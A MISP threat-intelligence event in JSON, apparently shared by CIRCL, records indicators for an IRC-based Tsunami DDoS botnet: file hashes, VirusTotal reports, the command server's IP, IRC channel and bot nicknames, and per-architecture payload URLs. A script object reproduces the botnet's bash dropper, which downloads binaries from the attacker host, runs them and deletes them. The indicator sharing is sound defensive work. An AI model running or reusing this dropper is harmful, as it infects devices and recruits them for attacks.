{
"Event" : {
"analysis" : "2" ,
"date" : "2019-04-27" ,
"extends_uuid" : "" ,
"info" : "OSINT - Analysis of an IRC based Botnet" ,
"publish_timestamp" : "1556355887" ,
"published" : true ,
"threat_level_id" : "3" ,
"timestamp" : "1556355866" ,
"uuid" : "5cc410a0-be10-4990-acf6-44cc02de0b81" ,
"Orgc" : {
"name" : "CIRCL" ,
"uuid" : "55f6ea5e-2c60-40e5-964f-47a8950d210f"
} ,
"Tag" : [
{
"colour" : "#004646" ,
"local" : "0" ,
"name" : "type:OSINT" ,
"relationship_type" : ""
} ,
{
"colour" : "#0071c3" ,
"local" : "0" ,
"name" : "osint:lifetime=\"perpetual\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0087e8" ,
"local" : "0" ,
"name" : "osint:certainty=\"50\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#ffffff" ,
"local" : "0" ,
"name" : "tlp:white" ,
"relationship_type" : ""
} ,
{
"colour" : "#0088cc" ,
"local" : "0" ,
"name" : "misp-galaxy:malpedia=\"Tsunami\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#5ed600" ,
"local" : "0" ,
"name" : "ddos:type=\"flooding-attack\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#00bdbd" ,
"local" : "0" ,
"name" : "ecsirt:availability=\"ddos\"" ,
"relationship_type" : ""
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556353198" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc410ae-1374-4513-b215-479e02de0b81" ,
"value" : "49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-5500-4efe-a798-492b02de0b81" ,
"value" : "http://185.244.25.235/mips"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-bff0-47d9-aadc-4c0e02de0b81" ,
"value" : "http://185.244.25.235/mipsel"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-c50c-43dd-905d-4e5f02de0b81" ,
"value" : "http://185.244.25.235/sh4"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-d280-413b-9c00-492c02de0b81" ,
"value" : "http://185.244.25.235/x86"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-5b24-41a5-97b7-4c6802de0b81" ,
"value" : "http://185.244.25.235/armv7l"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-15ec-4cc3-a885-44c702de0b81" ,
"value" : "http://185.244.25.235/armv6l"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-f0bc-4279-a64b-478a02de0b81" ,
"value" : "http://185.244.25.235/i686"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-023c-4b02-ae81-43bf02de0b81" ,
"value" : "http://185.244.25.235/powerpc"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-9a80-4f29-af94-4ccd02de0b81" ,
"value" : "http://185.244.25.235/i586"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-ef0c-426c-9b7c-4e3802de0b81" ,
"value" : "http://185.244.25.235/m68k"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-1d2c-4f08-861f-4a8802de0b81" ,
"value" : "http://185.244.25.235/sparc"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-a5f4-4644-8938-448102de0b81" ,
"value" : "http://185.244.25.235/armv4l"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-ecc4-4beb-b4f1-4f8902de0b81" ,
"value" : "http://185.244.25.235/armv5l"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-4048-4450-913a-415a02de0b81" ,
"value" : "http://185.244.25.235/440fp"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-cc64-4ea0-ac90-41a702de0b81" ,
"value" : "31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-b52c-4fc2-9cc7-4b2502de0b81" ,
"value" : "fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-2b74-4df3-9d09-4d0d02de0b81" ,
"value" : "284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-7878-4dcf-a69c-474802de0b81" ,
"value" : "32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-7f90-42a3-8865-4b6e02de0b81" ,
"value" : "976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-dbd0-464c-b6de-462202de0b81" ,
"value" : "f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-235c-49fe-8303-4a8e02de0b81" ,
"value" : "3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-58f0-4fff-810e-472d02de0b81" ,
"value" : "34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-a4c8-4691-8b09-443902de0b81" ,
"value" : "3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-31dc-4d16-b61e-4b6502de0b81" ,
"value" : "62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d"
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355783" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "5cc41ac7-0aa4-4bff-8f34-4bd402de0b81" ,
"value" : "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet"
}
] ,
"Object" : [
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556354542" ,
"uuid" : "332718dd-e3ba-40b1-bb59-06318357f8e2" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "332718dd-e3ba-40b1-bb59-06318357f8e2" ,
"referenced_uuid" : "ec7ab03e-c8dd-4dd2-886e-cf39dada576c" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556353212" ,
"uuid" : "5cc410bc-73a0-4933-8799-4e0c02de0b81"
} ,
{
"comment" : "" ,
"object_uuid" : "332718dd-e3ba-40b1-bb59-06318357f8e2" ,
"referenced_uuid" : "5cc410e3-9a44-4c3a-abb2-498602de0b81" ,
"relationship_type" : "connects-to" ,
"timestamp" : "1556353280" ,
"uuid" : "5cc41100-81b4-4504-9ec5-4ce202de0b81"
} ,
{
"comment" : "" ,
"object_uuid" : "332718dd-e3ba-40b1-bb59-06318357f8e2" ,
"referenced_uuid" : "5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81" ,
"relationship_type" : "connects-to" ,
"timestamp" : "1556354542" ,
"uuid" : "5cc415ee-fba8-4915-89b9-4d6202de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556353198" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "353bb33b-de63-4356-ba84-d6046e4279db" ,
"value" : "82062b666f09fc5c0fe4f68d1ea90916"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556353198" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "a928df56-4559-47ab-83d6-f5f7a7cbec25" ,
"value" : "b35d4b7980d361874e84e76eddbaff83c2c5790f"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556353198" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "133120eb-20ec-401c-9c89-47272373bb05" ,
"value" : "49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556353212" ,
"uuid" : "ec7ab03e-c8dd-4dd2-886e-cf39dada576c" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556353198" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "4bef3161-25cf-4364-bcef-432bc49c6834" ,
"value" : "2018-12-21T07:40:44"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556353198" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "73e29dd1-c3dd-40bd-91e1-660a20460fe9" ,
"value" : "https://www.virustotal.com/file/49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0/analysis/1545378044/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556353198" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "cbd0000d-8368-430e-85e0-7c2cd4871b09" ,
"value" : "26/57"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "An IP address (or domain or hostname) and a port seen as a tuple (or as a triple) in a specific time frame." ,
"meta-category" : "network" ,
"name" : "ip-port" ,
"template_uuid" : "9f8cea74-16fe-4968-a2b4-026676949ac6" ,
"template_version" : "7" ,
"timestamp" : "1556353315" ,
"uuid" : "5cc410e3-9a44-4c3a-abb2-498602de0b81" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "5cc410e3-9a44-4c3a-abb2-498602de0b81" ,
"referenced_uuid" : "5cc410ae-1374-4513-b215-479e02de0b81" ,
"relationship_type" : "connected-from" ,
"timestamp" : "1556353315" ,
"uuid" : "5cc41123-6a44-4259-96bf-497602de0b81"
}
] ,
"Attribute" : [
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ip" ,
"timestamp" : "1556353251" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "5cc410e3-d92c-4425-a0ab-49f202de0b81" ,
"value" : "185.244.25.235"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "dst-port" ,
"timestamp" : "1556353251" ,
"to_ids" : false ,
"type" : "port" ,
"uuid" : "5cc410e3-28e0-44f4-ab38-44da02de0b81" ,
"value" : "80"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "An IRC object to describe an IRC server and the associated channels." ,
"meta-category" : "network" ,
"name" : "irc" ,
"template_uuid" : "4bbbc004-c344-4b20-8672-b41102177fc7" ,
"template_version" : "2" ,
"timestamp" : "1556355330" ,
"uuid" : "5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "nickname" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc4152c-470c-4c48-b864-48d302de0b81" ,
"value" : "AmpAttacks"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ip" ,
"timestamp" : "1556355330" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "5cc4152c-86c0-4511-bc5f-450902de0b81" ,
"value" : "185.244.25.235"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "channel" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc4152c-bd1c-4174-94ba-4c7202de0b81" ,
"value" : "Summit"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "dst-port" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "port" ,
"uuid" : "5cc4152c-6de0-4f8b-8e6f-4d1d02de0b81" ,
"value" : "6667"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "nickname" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc41660-2350-47b7-8703-4df902de0b81" ,
"value" : "[x86_64|BWQLXKB]"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "nickname" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc41660-a6c4-4736-a284-4b7902de0b81" ,
"value" : "[MIPS|WGEQAV]"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "nickname" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc41660-b8d8-4c08-a98b-4c3002de0b81" ,
"value" : "[ARM4T|PCVREB]"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts." ,
"meta-category" : "misc" ,
"name" : "script" ,
"template_uuid" : "6bce7d01-dbec-4054-b3c2-3655a19382e2" ,
"template_version" : "3" ,
"timestamp" : "1556355040" ,
"uuid" : "5cc417e0-af4c-4df0-974b-4cd102de0b81" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "script" ,
"timestamp" : "1556355041" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc417e1-d624-429e-a881-407a02de0b81" ,
"value" : "#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mips; chmod +x mips; ./mips; rm -rf mips\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sh4; chmod +x sh4; ./sh4; rm -rf sh4\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/x86; chmod +x x86; ./x86; rm -rf x86\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i686; chmod +x i686; ./i686; rm -rf i686\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i586; chmod +x i586; ./i586; rm -rf i586\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/m68k; chmod +x m68k; ./m68k; rm -rf m68k\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sparc; chmod +x sparc; ./sparc; rm -rf sparc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/440fp; chmod +x 440fp; ./440fp; rm -rf 440fp"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "language" ,
"timestamp" : "1556355041" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc417e1-3a1c-422d-bd78-4e8102de0b81" ,
"value" : "Bash"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1556355050" ,
"to_ids" : false ,
"type" : "filename" ,
"uuid" : "5cc417e1-3490-4743-8a5d-42ae02de0b81" ,
"value" : "sh"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "state" ,
"timestamp" : "1556355041" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc417e1-9198-4713-9aeb-4ee602de0b81" ,
"value" : "Malicious"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355092" ,
"uuid" : "6264284d-c9d5-4c12-8ba3-0f3c4ac9231a" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "6264284d-c9d5-4c12-8ba3-0f3c4ac9231a" ,
"referenced_uuid" : "c584310f-cfa6-4ca0-b283-88853eff679e" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355095" ,
"uuid" : "5cc41817-0044-43c2-9144-44f502de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "3c442568-e293-401d-a37c-0ab855c50bf8" ,
"value" : "1cc9232302cb7569dc6dcd76fe5d7c48"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "1a4460ab-f231-431f-9c40-8a14127a21db" ,
"value" : "3c24b5150afbcfc8b5b98740329e279c778acfec"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "42a36b99-1c82-482e-b298-8812fcfbea2d" ,
"value" : "284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355092" ,
"uuid" : "c584310f-cfa6-4ca0-b283-88853eff679e" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "c979bfbb-fa6b-435e-a994-2212c5b430ee" ,
"value" : "2019-04-07T05:10:51"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "4db99dd0-83ff-456e-9796-816f83b2c265" ,
"value" : "https://www.virustotal.com/file/284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a/analysis/1554613851/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "dcffe0ba-339e-4ab0-b00d-729db80d1bf5" ,
"value" : "35/55"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "a6383e65-36cc-4e3a-8d2e-439afdb5a58b" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "a6383e65-36cc-4e3a-8d2e-439afdb5a58b" ,
"referenced_uuid" : "dc71966f-e4cf-4026-a133-50090fd4b95b" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355095" ,
"uuid" : "5cc41817-5014-466a-a830-49fd02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "4fd4815a-d6f1-4454-9d0b-740c1f4b120d" ,
"value" : "e49d17afc76617a6b2a445ef21342454"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "d72918eb-514b-4c72-8116-4420d1a08546" ,
"value" : "5d223085ca23494fd18622e6bc6d81b6f8eaa8a8"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "60614b70-e5de-484f-a5ce-1736fd2c69f3" ,
"value" : "3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355093" ,
"uuid" : "dc71966f-e4cf-4026-a133-50090fd4b95b" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "4c0b0672-508b-41f5-8ff0-6b13ee76b5c5" ,
"value" : "2019-04-14T04:40:19"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "1c60fb0a-aa1f-4dbc-a9ab-dc741863af4a" ,
"value" : "https://www.virustotal.com/file/3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc/analysis/1555216819/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "c5d88b4d-d908-4ecd-bcb1-bccf7e878a70" ,
"value" : "37/57"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "7c1420e2-b2c6-455a-ae2d-675b32ffa908" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "7c1420e2-b2c6-455a-ae2d-675b32ffa908" ,
"referenced_uuid" : "67696428-f0ea-4068-b00a-f669ee50ae03" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-142c-4b71-9410-445802de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "62e954a3-4db9-457b-9cd1-d2af06616d3c" ,
"value" : "30097dc12f07b9d44fd4bb32ea30cd4e"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "867e4b1e-b031-46ea-9753-8b1ec86a21ff" ,
"value" : "4f2350b20810ad45d40036c12d23239df1e3eaad"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "44cffa81-e17b-4721-97d0-ba17f13dbdb8" ,
"value" : "32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355093" ,
"uuid" : "67696428-f0ea-4068-b00a-f669ee50ae03" ,
